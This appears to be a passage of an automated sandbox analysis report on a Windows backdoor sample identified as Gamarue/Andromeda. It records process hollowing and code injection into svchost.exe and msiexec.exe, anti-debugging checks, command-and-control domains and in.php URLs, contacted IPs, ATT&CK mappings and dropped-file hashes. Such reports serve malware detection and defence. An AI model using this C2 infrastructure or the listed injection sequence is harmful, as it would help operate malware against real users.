Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 4_2_00401E7F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00401E7F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_001E3493 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_001E3493
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_001E2D41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_001E2D41

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 147.75.61.38 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pe.suckmycocklameavindustry.in
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: xdqzpbcgrvkj.ru
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: anam0rph.su
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 34.29.71.138 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Section unmapped: C:\Users\user\Desktop\Hu25VEa8Dr.exe base address: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Section unmapped: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base address: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Section unmapped: C:\Users\user\Desktop\Hu25VEa8Dr.exe base address: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: CD0000	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Memory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Memory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Memory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Memory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 403000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Memory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 7EFDE008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Memory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Memory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Memory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Memory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 403000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Memory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 7EFDE008	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Memory allocated: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Memory allocated: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Memory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Memory written: C:\Users\user\Desktop\Hu25VEa8Dr.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Memory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Memory written: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe base: 400000 value starts with: 4D5A	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe

Code function: 2_2_10001000 bedevahetay,LoadLibraryA,GetCommandLineA,PathGetArgsA,RtlZeroMemory,LoadLibraryA,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,

2_2_10001000

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process created: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Process created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe "C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Process created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\syswow64\svchost.exe	Jump to behavior

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Code function: 4_2_00401000 GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

4_2_00401000

Source: C:\Windows\SysWOW64\svchost.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Code function: 4_2_0040332F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_0040332F

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Code function: 0_2_00405A2E GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405A2E

Source: Hu25VEa8Dr.exe

Binary or memory string: avp.exe

Stealing of Sensitive Information

Yara detected Gamarue

Source: Yara match

File source: Process Memory Space: svchost.exe PID: 1740, type: MEMORYSTR

Remote Access Functionality

Yara detected Gamarue

Source: Yara match

File source: Process Memory Space: svchost.exe PID: 1740, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	13 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	711 Process Injection	21 Software Packing	LSASS Memory	1 Peripheral Device Discovery	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Security Account Manager	1 System Network Connections Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Masquerading	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Modify Registry	LSA Secrets	116 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	13 Virtualization/Sandbox Evasion	Cached Domain Credentials	361 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	711 Process Injection	DCSync	13 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Hu25VEa8Dr.exe	96%	ReversingLabs	Win32.Backdoor.Andromeda
Hu25VEa8Dr.exe	82%	Virustotal		Browse
Hu25VEa8Dr.exe	100%	Avira	TR/AD.Gamarue.njjtd

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Gozekeneka.dll	100%	Avira	HEUR/AGEN.1358866
C:\Users\user\AppData\Local\Temp\0BBFF.tmp	100%	Avira	TR/AD.Gamarue.njjtd
C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll	100%	Avira	TR/Symmi.17001.30
C:\Users\user\AppData\Local\Temp\naseropuxeq.dll	100%	Avira	TR/Graftor.75972.7
C:\Users\user\AppData\Local\Temp\yiduyevutog.dll	100%	Avira	TR/Symmi.17001.22
C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	100%	Avira	TR/Agent.hwpf
C:\Users\user\AppData\Local\Temp\natigezeholi.dll	100%	Avira	HEUR/AGEN.1328724
C:\ProgramData\Local Settings\Temp\msoiruj.bat	100%	Avira	TR/AD.Gamarue.djauj
C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	100%	Avira	HEUR/AGEN.1344339
C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll	100%	Avira	TR/Symmi.17001.23
C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	100%	Avira	TR/AD.Gamarue.djauj
C:\Users\user\AppData\Local\Temp\Zojemilocan.dll	100%	Avira	HEUR/AGEN.1322941
C:\ProgramData\Local Settings\Temp\msoiruj.bat	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	100%	Joe Sandbox ML
C:\ProgramData\Local Settings\Temp\msoiruj.bat	87%	ReversingLabs	Win32.Backdoor.Andromeda
C:\ProgramData\Local Settings\Temp\msoiruj.bat	85%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\0BBFF.tmp	96%	ReversingLabs	Win32.Backdoor.Andromeda
C:\Users\user\AppData\Local\Temp\0BBFF.tmp	82%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\Firozedikami.dll	59%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\Firozedikami.dll	59%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\Gozekeneka.dll	77%	ReversingLabs	Win32.Trojan.Tiggre
C:\Users\user\AppData\Local\Temp\Gozekeneka.dll	75%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll	71%	ReversingLabs	Win32.Trojan.Ursu
C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll	66%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	76%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	77%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	87%	ReversingLabs	Win32.Backdoor.Andromeda
C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	85%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	57%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	61%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\Zojemilocan.dll	64%	ReversingLabs	Win32.Backdoor.Andromeda
C:\Users\user\AppData\Local\Temp\Zojemilocan.dll	74%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\naseropuxeq.dll	59%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\naseropuxeq.dll	71%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\natigezeholi.dll	78%	ReversingLabs	Win32.Trojan.Ursu
C:\Users\user\AppData\Local\Temp\natigezeholi.dll	76%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll	67%	ReversingLabs	Win32.Trojan.Symmi
C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll	67%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\yiduyevutog.dll	71%	ReversingLabs	Win32.Trojan.Ursu
C:\Users\user\AppData\Local\Temp\yiduyevutog.dll	73%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
xdqzpbcgrvkj.ru	19%	Virustotal	Browse
anam0rph.su	11%	Virustotal	Browse
pe.suckmycocklameavindustry.in	7%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://pe.suckmycocklameavindustry.in/	0%	Avira URL Cloud	safe
http://orzdwjtvmein.in/in.php	100%	Avira URL Cloud	malware
http://bdcrqgonzmwuehky.nl/in.php	100%	Avira URL Cloud	malware
http://pe.suckmycocklameavindustry.in/DOS_STUBhttp://sc.suckmycocklameavindustry.in/ImageBasehttp://	0%	Avira URL Cloud	safe
http://orzdwjtvmein.in/in.php	11%	Virustotal		Browse
http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigffC:	0%	Avira URL Cloud	safe
http://pe.suckmycocklameavindustry.in/	7%	Virustotal		Browse
http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff6Tl	0%	Avira URL Cloud	safe
http://somicrososoft.ru/in.php	100%	Avira URL Cloud	malware
http://pe.suckmycocklameavindustry.in/DOS_STUBhttp://sc.suckmycocklameavindustry.in/ImageBasehttp://	3%	Virustotal		Browse
http://img.suckmycocklameavindustry.in/	0%	Avira URL Cloud	safe
http://xdqzpbcgrvkj.ru/in.php	100%	Avira URL Cloud	malware
http://bdcrqgonzmwuehky.nl/in.php	11%	Virustotal		Browse
http://somicrososoft.ru/in.php	14%	Virustotal		Browse
http://anam0rph.su/in.php	100%	Avira URL Cloud	malware
http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqh	100%	Avira URL Cloud	malware
http://img.suckmycocklameavindustry.in/	4%	Virustotal		Browse
http://sc.suckmycocklameavindustry.in/	0%	Avira URL Cloud	safe
http://ygiudewsqhct.in/in.php	100%	Avira URL Cloud	malware
http://anam0rph.su/in.php	13%	Virustotal		Browse
http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqh	14%	Virustotal		Browse
http://ygiudewsqhct.in/in.php	13%	Virustotal		Browse
http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff	0%	Avira URL Cloud	safe
http://xdqzpbcgrvkj.ru/in.php	17%	Virustotal		Browse
http://sc.suckmycocklameavindustry.in/	7%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pe.suckmycocklameavindustry.in	34.29.71.138	true	true	7%, Virustotal, Browse	unknown
xdqzpbcgrvkj.ru	147.75.61.38	true	true	19%, Virustotal, Browse	unknown
anam0rph.su	unknown	unknown	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://xdqzpbcgrvkj.ru/in.php	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://pe.suckmycocklameavindustry.in/	svchost.exe	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://orzdwjtvmein.in/in.php	svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://nsis.sf.net/NSIS_Error	msiexec.exe, msiexec.exe, 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000005.00000000.351213851.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000007.00000000.364458175.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000008.00000000.365114158.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, Hu25VEa8Dr.exe, 0BBFF.tmp.4.dr, msoiruj.bat.9.dr, msiexec.exe.4.dr	false		high
http://bdcrqgonzmwuehky.nl/in.php	svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://pe.suckmycocklameavindustry.in/DOS_STUBhttp://sc.suckmycocklameavindustry.in/ImageBasehttp://	svchost.exe, 00000009.00000003.373478974.0000000000130000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigffC:	svchost.exe, 00000009.00000002.381503603.00000000004D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381500240.000000000044A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff6Tl	svchost.exe, 00000009.00000002.381503603.0000000000484000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://somicrososoft.ru/in.php	svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp	false	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://img.suckmycocklameavindustry.in/	svchost.exe	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/	Hu25VEa8Dr.exe, 00000003.00000002.350134891.0000000002120000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	Hu25VEa8Dr.exe, 0BBFF.tmp.4.dr, msoiruj.bat.9.dr, msiexec.exe.4.dr	false		high
http://anam0rph.su/in.php	svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp	false	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqh	svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp	false	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://sc.suckmycocklameavindustry.in/	svchost.exe	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ygiudewsqhct.in/in.php	svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp	false	13%, Virustotal, Browse Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.29.71.138	pe.suckmycocklameavindustry.in	United States		2686	ATGS-MMD-ASUS	true
147.75.61.38	xdqzpbcgrvkj.ru	Switzerland		54825	PACKETUS	true

Private

IP
192.168.2.255

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1317431
Start date and time:	2023-10-01 06:00:34 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Hu25VEa8Dr.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:	9535a9bb1ae8f620d7cbd7d9f5c20336b0fd2c78d1a7d892d76e4652dd8b2be7
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@17/19@7/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 106 Number of non-executed functions: 135

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
Excluded IPs from analysis (whitelisted): 209.197.3.8, 8.252.14.254, 67.26.203.254, 8.253.135.120, 8.252.139.254, 8.252.140.126, 20.72.235.82
Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, redir.update.msft.com.trafficmanager.net, www.update.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:01:19	API Interceptor	8x Sleep call for process: Hu25VEa8Dr.exe modified
06:01:26	API Interceptor	1x Sleep call for process: msiexec.exe modified
06:01:35	API Interceptor	42x Sleep call for process: svchost.exe modified

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	88209
Entropy (8bit):	7.192271927525946
Encrypted:	false
SSDEEP:	1536:cpgpHzb9dZVX9fHMvG0D3XJz0MAuV9wWGm1FJaThXPF5zRRn55NATTeIIQ:qgXdZt9P6D3XJYMHV9wWGkEZ7Fx55NCr
MD5:	B3657BCFE8240BC0985093A0F8682703
SHA1:	4E19F1CC04645356FD523E67655E5D76A19A86BA
SHA-256:	5F4B0AA22CE65B30FB232421673FAD4C126970928207ADE256D3BFEE33DC3687
SHA-512:	71C06203020C5C5BCB1C9F8383544BF270C5D7FAC1E732FEC1F78820BBF91A6DB5888FF57D782A05D49A960351B5436966C78974C60B40908099603118C56B15
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87% Antivirus: Virustotal, Detection: 85%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......p..X?...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc...X?...p...@...z..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0BBFF.tmp

Download File

Process:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	196227
Entropy (8bit):	7.67760121359675
Encrypted:	false
SSDEEP:	3072:ugXdZt9P6D3XJ3TCM/vosUE2L/TLqtAyD2XXhtksIae31fXJHhKgzyJtdeV:ue34p/vr6yrC2sJe35ZBKg0dW
MD5:	BC76BD7B332AA8F6AEDBB8E11B7BA9B6
SHA1:	C6858031315A50EC87E37966291EC69B64600EFB
SHA-256:	9535A9BB1AE8F620D7CBD7D9F5C20336B0FD2C78D1A7D892D76E4652DD8B2BE7
SHA-512:	C74A8A893D0D91EF9423C75C14E701102F01D46B4638D7E3184C95BFD4FF29F9CAB71FE5DE45E8E201DCDB8DF77E952A18E32BFED5014B9C8155C189825F37E9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 82%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......p...C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C...p...D...z..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0BBFF.tmp:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Hu25VEa8Dr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	low
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\Firozedikami.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.4737941425256986
Encrypted:	false
SSDEEP:	24:ev1GSN60IFZCJdYvP/yYhqIVrfRgtaU40Zfxw6XgE:q0LZCDYHJrftofXg
MD5:	775A98111E9A1142F44EE78ABD0C37AA
SHA1:	1566C2070880FD0A7533AB34F19C9DF13E166F30
SHA-256:	855C6ECC9D9B3BA70B1E4D6F1CECC9AE88F9A36E62338C0C9000CEF28EA85F85
SHA-512:	B154DCCBEC5D4F236C66B1FC045A886C4CBB8DF6CD11FCF7FF48101AE233AD0E849424014401348F7815C788EAE366A1FD681449E534FBD4554475507718E228
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 59% Antivirus: Virustotal, Detection: 59%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........1..._..._..._.).U.._...^.._.).T.._.).[.._.Rich.._.........................PE..L....xGQ...........!................f........ ...............................P....................................... ..P.... ..(............................@..P.................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...H....0......................@....reloc..v....@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

